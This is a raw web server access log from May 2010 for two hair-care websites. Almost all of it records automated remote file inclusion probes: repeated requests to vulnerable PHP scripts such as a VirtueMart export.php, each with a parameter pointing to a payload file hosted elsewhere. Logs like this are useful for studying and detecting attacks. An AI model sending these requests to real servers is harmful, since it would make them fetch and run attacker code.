216.131.91.180 - - [03/May/2010:03:18:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:18:47 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:18:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:18:49 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:18:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.119 - - [03/May/2010:03:19:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
94.23.15.24 - - [03/May/2010:03:19:15 -0700] "GET /main.php?sayfa=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.15.24 - - [03/May/2010:03:19:15 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.15.24 - - [03/May/2010:03:19:15 -0700] "GET /logs//main.php?sayfa=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:23:42 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:24:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:24:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:24:07 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:25:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:25:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:25:05 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.15.24 - - [03/May/2010:03:26:45 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:27:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:27:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:27:02 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:27:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:27:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:27:03 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:34:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:34:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:34:44 -0700] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:35:23 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:36:45 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:36:45 -0700] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:36:45 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:37:05 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.80.122.44 - - [03/May/2010:03:37:42 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [03/May/2010:03:38:35 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:03:38:35 -0700] "GET /logs///bbs//////delete_comment.php?board_skin_path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:03:38:35 -0700] "GET //bbs//////delete_comment.php?board_skin_path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:03:38:35 -0700] "GET /logs/access_100426.log///bbs//////delete_comment.php?board_skin_path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:03:38:37 -0700] "GET //bbs//////delete_comment.php?board_skin_path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:03:38:37 -0700] "GET /logs///bbs//////delete_comment.php?board_skin_path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:03:38:37 -0700] "GET /logs/access_100426.log///bbs//////delete_comment.php?board_skin_path=http://cuitz.com/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:40:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:40:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:40:01 -0700] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:40:26 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:43:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:43:32 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:43:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:44:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:44:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:44:15 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:44:46 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:44:46 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:44:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:18 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:24 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:24 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:50:54 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:51:11 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:51:16 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:51:46 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:03:51:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12912 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:03:54:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:54:53 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:54:53 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:54:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:54:57 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:54:57 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:17 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:21 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:21 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:25 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:25 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:25 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:25 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:37 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:46 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:55:58 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:58:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:58:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:58:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:58:55 -0700] "GET /logs/access_100301.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:58:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:58:55 -0700] "GET /logs/access_100301.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:59:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:59:24 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:03:59:24 -0700] "GET /logs/access_100301.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.139.0.75 - - [03/May/2010:03:59:54 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.139.0.75 - - [03/May/2010:03:59:54 -0700] "GET /?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.139.0.75 - - [03/May/2010:03:59:54 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.131.91.180 - - [03/May/2010:04:00:38 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:04:00:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:04:00:46 -0700] "GET /logs/access_100329.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
